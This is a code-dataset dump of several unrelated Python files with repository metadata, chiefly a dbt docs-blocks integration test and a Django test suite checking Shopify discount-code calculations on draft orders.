| 49.163934 | 110 | 0.697232 | 580 | 2,999 | 3.598276 | 0.472414 | 0.01725 | 0.006708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.219336 | 0.075692 | 2,999 | 60 | 111 | 49.983333 | 0.53355 | 0.055352 | 0 | 0 | 0 | 0.72 | 0.686815 | 0.629198 | 0.02 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0.06 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e02e258399fee69d4d68bcdabb98b634c7dc4ea6 | 5,052 | py | Python | test/integration/035_docs_blocks/test_docs_blocks.py | vogt4nick/dbt | 1bd82d4914fd80fcc6fe17140e46554ad677eab0 | ["Apache-2.0"] | 1 | 2021-04-08T03:33:33.000Z | 2021-04-08T03:33:33.000Z | test/integration/035_docs_blocks/test_docs_blocks.py | azhard/dbt | 9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55 | ["Apache-2.0"] | 1 | 2021-04-30T21:33:11.000Z | 2021-04-30T21:33:11.000Z | test/integration/035_docs_blocks/test_docs_blocks.py | azhard/dbt | 9cd7cbc9e35e5a7c8c4f17a3d113263f4421ab55 | ["Apache-2.0"] | 1 | 2021-02-25T13:47:29.000Z | 2021-02-25T13:47:29.000Z |
import json
import os
from test.integration.base import DBTIntegrationTest, use_profile
import dbt.exceptions
class TestGoodDocsBlocks(DBTIntegrationTest):
@property
def schema(self):
return 'docs_blocks_035'
@staticmethod
def dir(path):
return os.path.normpath(path)
@property
def models(self):
return self.dir("models")
@use_profile('postgres')
def test_postgres_valid_doc_ref(self):
self.assertEqual(len(self.run_dbt()), 1)
self.assertTrue(os.path.exists('./target/manifest.json'))
with open('./target/manifest.json') as fp:
manifest = json.load(fp)
model_data = manifest['nodes']['model.test.model']
self.assertEqual(
model_data['description'],
'My model is just a copy of the seed'
)
self.assertEqual(
{
'name': 'id',
'description': 'The user ID number',
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['id']
)
self.assertEqual(
{
'name': 'first_name',
'description': "The user's first name",
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['first_name']
)
self.assertEqual(
{
'name': 'last_name',
'description': "The user's last name",
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['last_name']
)
self.assertEqual(len(model_data['columns']), 3)
@use_profile('postgres')
def test_postgres_alternative_docs_path(self):
self.use_default_project({"docs-paths": [self.dir("docs")]})
self.assertEqual(len(self.run_dbt()), 1)
self.assertTrue(os.path.exists('./target/manifest.json'))
with open('./target/manifest.json') as fp:
manifest = json.load(fp)
model_data = manifest['nodes']['model.test.model']
self.assertEqual(
model_data['description'],
'Alt text about the model'
)
self.assertEqual(
{
'name': 'id',
'description': 'The user ID number with alternative text',
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['id']
)
self.assertEqual(
{
'name': 'first_name',
'description': "The user's first name",
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['first_name']
)
self.assertEqual(
{
'name': 'last_name',
'description': "The user's last name in this other file",
'data_type': None,
'meta': {},
'tags': [],
},
model_data['columns']['last_name']
)
self.assertEqual(len(model_data['columns']), 3)
@use_profile('postgres')
def test_postgres_alternative_docs_path_missing(self):
self.use_default_project({"docs-paths": [self.dir("not-docs")]})
with self.assertRaises(dbt.exceptions.CompilationException):
self.run_dbt()
class TestMissingDocsBlocks(DBTIntegrationTest):
@property
def schema(self):
return 'docs_blocks_035'
@staticmethod
def dir(path):
return os.path.normpath(path)
@property
def models(self):
return self.dir("missing_docs_models")
@use_profile('postgres')
def test_postgres_missing_doc_ref(self):
# The run should fail since we could not find the docs reference.
with self.assertRaises(dbt.exceptions.CompilationException):
self.run_dbt()
class TestBadDocsBlocks(DBTIntegrationTest):
@property
def schema(self):
return 'docs_blocks_035'
@staticmethod
def dir(path):
return os.path.normpath(path)
@property
def models(self):
return self.dir("invalid_name_models")
@use_profile('postgres')
def test_postgres_invalid_doc_ref(self):
# The run should fail since we could not find the docs reference.
with self.assertRaises(dbt.exceptions.CompilationException):
self.run_dbt(expect_pass=False)
class TestDuplicateDocsBlock(DBTIntegrationTest):
@property
def schema(self):
return 'docs_blocks_035'
@staticmethod
def dir(path):
return os.path.normpath(path)
@property
def models(self):
return self.dir("duplicate_docs")
@use_profile('postgres')
def test_postgres_duplicate_doc_ref(self):
with self.assertRaises(dbt.exceptions.CompilationException):
self.run_dbt(expect_pass=False)
| 28.223464 | 74 | 0.548496 | 509 | 5,052 | 5.280943 | 0.194499 | 0.066964 | 0.047619 | 0.046875 | 0.864583 | 0.864583 | 0.852307 | 0.80878 | 0.80878 | 0.743304 | 0 | 0.00472 | 0.328979 | 5,052 | 178 | 75 | 28.382022 | 0.788201 | 0.025139 | 0 | 0.684932 | 0 | 0 | 0.182853 | 0.017879 | 0 | 0 | 0 | 0 | 0.123288 | 1 | 0.123288 | false | 0.013699 | 0.027397 | 0.082192 | 0.260274 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e04af1250bea305be2915269d83f457ea7b8c545 | 81 | py | Python | reaver/__init__.py | HatsuneMiku4/reaver | 059320ce109498ec4100fcc2cee32177c427f1ea | ["MIT"] | 239 | 2019-01-18T08:47:24.000Z | 2022-03-21T08:29:50.000Z | reaver/__init__.py | HatsuneMiku4/reaver | 059320ce109498ec4100fcc2cee32177c427f1ea | ["MIT"] | 19 | 2019-01-27T10:10:12.000Z | 2021-12-29T20:02:05.000Z | reaver/__init__.py | HatsuneMiku4/reaver | 059320ce109498ec4100fcc2cee32177c427f1ea | ["MIT"] | 44 | 2019-01-18T02:12:46.000Z | 2021-07-28T14:54:10.000Z |
import reaver.envs
import reaver.models
import reaver.agents
import reaver.utils
| 16.2 | 20 | 0.851852 | 12 | 81 | 5.75 | 0.5 | 0.695652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098765 | 81 | 4 | 21 | 20.25 | 0.945205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ebdf814a103c9f0a39a556a56a4469cf9d61c95 | 27,601 | py | Python | django_toolbox/discounts/tests/test_discount_basic.py | stlk/django-toolbox | 146abdae59f7b27be7aaddce611faea91a0d4b69 | ["MIT"] | 2 | 2019-10-03T13:37:01.000Z | 2020-07-02T11:43:20.000Z | django_toolbox/discounts/tests/test_discount_basic.py | stlk/django-toolbox | 146abdae59f7b27be7aaddce611faea91a0d4b69 | ["MIT"] | 7 | 2018-11-10T12:44:58.000Z | 2021-09-22T17:50:59.000Z | django_toolbox/discounts/tests/test_discount_basic.py | stlk/django-toolbox | 146abdae59f7b27be7aaddce611faea91a0d4b69 | ["MIT"] | null | null | null |
import copy
from unittest.mock import patch
from django.conf import settings
import responses
from django_toolbox.apps.billing.tests import ShopifyViewTest
from ...shopify_graphql_test import mock_response
from ..collections import DraftOrderResponse
from ..draft_order import create_draft_order
APP_NAME = settings.APP_NAME
PRODUCTS_IN_COLLECTIONS = {
"_159609389100": {
"_4413823025196": True,
"_4413823025195": True,
"_4413823025197": False,
}
}
AMOUNT_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {"greaterThanOrEqualToSubtotal": {"amount": "30.0"}},
"customerGets": {
"items": {"allItems": True},
"value": {"amount": {"amount": "20.0"}, "appliesOnEachItem": False},
},
}
}
}
AMOUNT_DISCOUNT_DATA_MIN_REQUIREMENTS_AMOUNT_FAIL = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {
"greaterThanOrEqualToSubtotal": {"amount": "3000000.0"}
},
"customerGets": {
"items": {"allItems": True},
"value": {"amount": {"amount": "20.0"}, "appliesOnEachItem": False},
},
}
}
}
COLLECTIONS_FIXED_AMOUNT_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"collections": {
"edges": [
{"node": {"id": "gid://shopify/Collection/159609389100"}}
]
}
},
"value": {"amount": {"amount": "10.0"}, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {"greaterThanOrEqualToQuantity": "2"},
"customerGets": {
"items": {
"products": {
"edges": [
{"node": {"id": "gid://shopify/Product/4413823025196"}},
{"node": {"id": "gid://shopify/Product/4413823156268"}},
]
}
},
"value": {"amount": {"amount": "70.0"}, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA_MIN_REQUIREMENTS_QUANTITY_FAIL = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {"greaterThanOrEqualToQuantity": "10"},
"customerGets": {
"items": {
"products": {
"edges": [
{"node": {"id": "gid://shopify/Product/4413823025196"}},
{"node": {"id": "gid://shopify/Product/4413823156268"}},
]
}
},
"value": {"amount": {"amount": "70.0"}, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA_APPLIES_ON_EACH_ITEM = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"products": {
"edges": [
{"node": {"id": "gid://shopify/Product/4413823025196"}},
{"node": {"id": "gid://shopify/Product/4413823156268"}},
]
}
},
"value": {"amount": {"amount": "70.0"}, "appliesOnEachItem": True},
},
}
}
}
PERCENTAGE_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": {"greaterThanOrEqualToQuantity": "2"},
"customerGets": {
"items": {"allItems": True},
"value": {"percentage": 0.2, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_ITEMS_PERCENTAGE_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"products": {
"edges": [
{"node": {"id": "gid://shopify/Product/4413823025196"}},
{"node": {"id": "gid://shopify/Product/4413823156268"}},
]
}
},
"value": {"percentage": 0.3, "appliesOnEachItem": False},
},
}
}
}
CUSTOMER_GETS_VARIANTS_PERCENTAGE_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"productVariants": {
"edges": [
{
"node": {
"id": "gid://shopify/ProductVariant/31547677245484"
}
},
{
"node": {
"id": "gid://shopify/ProductVariant/31547677278252"
}
},
]
}
},
"value": {"percentage": 0.5, "appliesOnEachItem": False},
},
}
}
}
COLLECTIONS_PERCENTAGE_DISCOUNT_DATA = {
"codeDiscountNodeByCode": {
"codeDiscount": {
"status": "ACTIVE",
"__typename": "DiscountCodeBasic",
"minimumRequirement": None,
"customerGets": {
"items": {
"collections": {
"edges": [
{"node": {"id": "gid://shopify/Collection/159609389100"}}
]
}
},
"value": {"percentage": 0.7, "appliesOnEachItem": False},
},
}
}
}
VARIABLES_INPUT = {
"input": {
"lineItems": [
{
"quantity": 2,
"variantId": "gid://shopify/ProductVariant/17744973103175",
"customAttributes": None,
"appliedDiscount": None,
}
],
"tags": APP_NAME,
"note": "",
"appliedDiscount": None,
"shippingAddress": None,
"metafields": [],
}
}
MULTIPLE_VARIABLES_INPUT = {
"input": {
"lineItems": [
{
"quantity": 2,
"variantId": "gid://shopify/ProductVariant/17744973103175",
"customAttributes": None,
"appliedDiscount": None,
},
{
"quantity": 1,
"variantId": "gid://shopify/ProductVariant/17744973103171",
"customAttributes": None,
"appliedDiscount": None,
},
{
"quantity": 1,
"variantId": "gid://shopify/ProductVariant/17744973103172",
"customAttributes": None,
"appliedDiscount": None,
},
],
"tags": APP_NAME,
"note": "",
"appliedDiscount": None,
"shippingAddress": None,
"metafields": [],
}
}
DRAFT_ORDER_CREATE_RESPONSE = DraftOrderResponse(
id=123, invoice_url="http://example.com/"
)
def get_offers_line_items(shop, data):
return [], []
class CreateDraftOrderDiscountBasicViewTest(ShopifyViewTest):
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_all_items(self, execute_mock):
mock_response(AMOUNT_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 17_744_973_103_175,
"properties": None,
"price": 25000,
"product_id": 4413820174380,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "20FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["appliedDiscount"] = {
"title": "20FIXEDOFF",
"value": 20.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_all_items_fail_min_requirements_amount(
self, execute_mock
):
mock_response(AMOUNT_DISCOUNT_DATA_MIN_REQUIREMENTS_AMOUNT_FAIL)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 17_744_973_103_175,
"properties": None,
"price": 25000,
"product_id": 4413820174380,
}
],
"currency": "CZK",
"total_price": 5000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "20FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["appliedDiscount"] = {
"title": "20FIXEDOFF",
"value": 20.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertNotEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_collections(self, execute_mock):
mock_response(COLLECTIONS_FIXED_AMOUNT_DISCOUNT_DATA)
mock_response(PRODUCTS_IN_COLLECTIONS)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
},
{
"quantity": 1,
"variant_id": 31547677245485,
"properties": None,
"price": 10000,
"product_id": 4413823025195,
},
{
"quantity": 1,
"variant_id": 31547677245487,
"properties": None,
"price": 10000,
"product_id": 4413823025197,
},
],
"currency": "CZK",
"total_price": 50000,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "10FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(MULTIPLE_VARIABLES_INPUT)
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "10FIXEDOFF",
"value": 3.33,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][1]["appliedDiscount"] = {
"title": "10FIXEDOFF",
"value": 3.33,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["lineItems"][1][
"variantId"
] = "gid://shopify/ProductVariant/31547677245485"
expected_input["input"]["lineItems"][2][
"variantId"
] = "gid://shopify/ProductVariant/31547677245487"
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_percentage_all_items(self, execute_mock):
mock_response(PERCENTAGE_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 17_744_973_103_175,
"properties": None,
"price": 25000,
"product_id": 4413820174380,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "20PERCENTOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["appliedDiscount"] = {
"title": "20PERCENTOFF",
"value": 20,
"valueType": "PERCENTAGE",
}
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_customer_gets_items(self, execute_mock):
mock_response(CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "70FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "70FIXEDOFF",
"value": 35.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["appliedDiscount"] = None
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_customer_gets_items_min_requirements_quantity_fail(
self, execute_mock
):
mock_response(
CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA_MIN_REQUIREMENTS_QUANTITY_FAIL
)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "70FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "70FIXEDOFF",
"value": 70.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["appliedDiscount"] = None
self.maxDiff = None
self.assertNotEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_fixed_amount_customer_gets_items_applies_on_each_item(
self, execute_mock
):
mock_response(CUSTOMER_GETS_ITEMS_AMOUNT_DISCOUNT_DATA_APPLIES_ON_EACH_ITEM)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "70FIXEDOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "70FIXEDOFF",
"value": 70.0,
"valueType": "FIXED_AMOUNT",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["appliedDiscount"] = None
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_percentage_customer_gets_items(self, execute_mock):
mock_response(CUSTOMER_GETS_ITEMS_PERCENTAGE_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"item_count": 2,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "30PERCENTOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "30PERCENTOFF",
"value": 30,
"valueType": "PERCENTAGE",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["appliedDiscount"] = None
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_percentage_customer_gets_variants(self, execute_mock):
mock_response(CUSTOMER_GETS_VARIANTS_PERCENTAGE_DISCOUNT_DATA)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
},
{
"quantity": 1,
"variant_id": 31547677278252,
"properties": None,
"price": 30000,
"product_id": 4413823156268,
},
],
"currency": "CZK",
"total_price": 80000,
"item_count": 3,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "50PERCENTOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["lineItems"] = [
{
"quantity": 2,
"variantId": "gid://shopify/ProductVariant/31547677245484",
"customAttributes": None,
"appliedDiscount": {
"title": "50PERCENTOFF",
"value": 50,
"valueType": "PERCENTAGE",
},
},
{
"quantity": 1,
"variantId": "gid://shopify/ProductVariant/31547677278252",
"customAttributes": None,
"appliedDiscount": {
"title": "50PERCENTOFF",
"value": 50,
"valueType": "PERCENTAGE",
},
},
]
expected_input["input"]["appliedDiscount"] = None
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
@responses.activate
@patch(
"django_toolbox.discounts.draft_order.execute_create_draft_order",
return_value=DRAFT_ORDER_CREATE_RESPONSE,
)
def test_applies_discount_percentage_collections(self, execute_mock):
mock_response(COLLECTIONS_PERCENTAGE_DISCOUNT_DATA)
mock_response(PRODUCTS_IN_COLLECTIONS)
data = {
"shop": self.shop.myshopify_domain,
"cart": {
"items": [
{
"quantity": 2,
"variant_id": 31547677245484,
"properties": None,
"price": 25000,
"product_id": 4413823025196,
}
],
"currency": "CZK",
"total_price": 50000,
"token": "cart_token",
"attributes": {"greeting": "they"},
"note": "",
},
"offers": [],
"discount_code": "70PERCENTOFF",
}
create_draft_order(self.shop, data, get_offers_line_items)
variables = execute_mock.call_args[0][1]
expected_input = copy.deepcopy(VARIABLES_INPUT)
expected_input["input"]["lineItems"][0]["appliedDiscount"] = {
"title": "70PERCENTOFF",
"value": 70,
"valueType": "PERCENTAGE",
}
expected_input["input"]["lineItems"][0][
"variantId"
] = "gid://shopify/ProductVariant/31547677245484"
expected_input["input"]["customAttributes"] = [
{"key": "greeting", "value": "they"}
]
self.maxDiff = None
self.assertDictEqual(variables, expected_input)
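# Editor's aside (not part of the test file): the 3.33 values in
# test_applies_discount_fixed_amount_collections are consistent with the
# 10.0 fixed discount being spread per unit over the eligible collection
# items (quantity 2 + quantity 1; the third product is outside the
# collection), assuming an even per-unit allocation rule:
eligible_units = 2 + 1
per_unit_discount = round(10.0 / eligible_units, 2)
assert per_unit_discount == 3.33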
| 33.991379 | 94 | 0.480019 | 1,959 | 27,601 | 6.476263 | 0.086269 | 0.055332 | 0.048238 | 0.034051 | 0.904627 | 0.885552 | 0.873493 | 0.855206 | 0.839994 | 0.805549 | 0 | 0.062871 | 0.395493 | 27,601 | 811 | 95 | 34.033292 | 0.697513 | 0 | 0 | 0.649007 | 0 | 0 | 0.25807 | 0.073621 | 0 | 0 | 0 | 0 | 0.013245 | 1 | 0.01457 | false | 0 | 0.010596 | 0.001325 | 0.027815 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1624cd5f0ff1118325044b8c8dd5cf7e9849dc3e | 41 | py | Python | pylanelet2/lanelet2/geometry.py | yuzhangbit/Lanelet2 | 62b8de59882b80efb94b419f7277c64a00fec9b4 | ["BSD-3-Clause"] | 3 | 2019-01-14T07:05:36.000Z | 2020-02-26T16:20:21.000Z | pylanelet2/lanelet2/geometry.py | stefanosecondo-tomtom/Lanelet2 | 88fc2d1b9292c40f64e6d47ca4c7b23da52bda7b | ["BSD-3-Clause"] | null | null | null | pylanelet2/lanelet2/geometry.py | stefanosecondo-tomtom/Lanelet2 | 88fc2d1b9292c40f64e6d47ca4c7b23da52bda7b | ["BSD-3-Clause"] | 1 | 2022-03-28T21:38:14.000Z | 2022-03-28T21:38:14.000Z |
from liblanelet2_geometry_pyapi import *
| 20.5 | 40 | 0.878049 | 5 | 41 | 6.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.097561 | 41 | 1 | 41 | 41 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1645b3eb15f35878ff54bdd8a49195c777ab5e11 | 66 | py | Python | robocode-vscode/tests/robocode_vscode_tests/__init__.py | emanlove/robotframework-lsp | b0d8862d24e3bc1b72d8ce9412a671571520e7d9 | ["ECL-2.0", "Apache-2.0"] | null | null | null | robocode-vscode/tests/robocode_vscode_tests/__init__.py | emanlove/robotframework-lsp | b0d8862d24e3bc1b72d8ce9412a671571520e7d9 | ["ECL-2.0", "Apache-2.0"] | 1 | 2021-09-30T15:40:29.000Z | 2021-09-30T15:40:29.000Z | robocode-vscode/tests/robocode_vscode_tests/__init__.py | emanlove/robotframework-lsp | b0d8862d24e3bc1b72d8ce9412a671571520e7d9 | ["ECL-2.0", "Apache-2.0"] | null | null | null |
import robocode_vscode
robocode_vscode.import_robocode_ls_core()
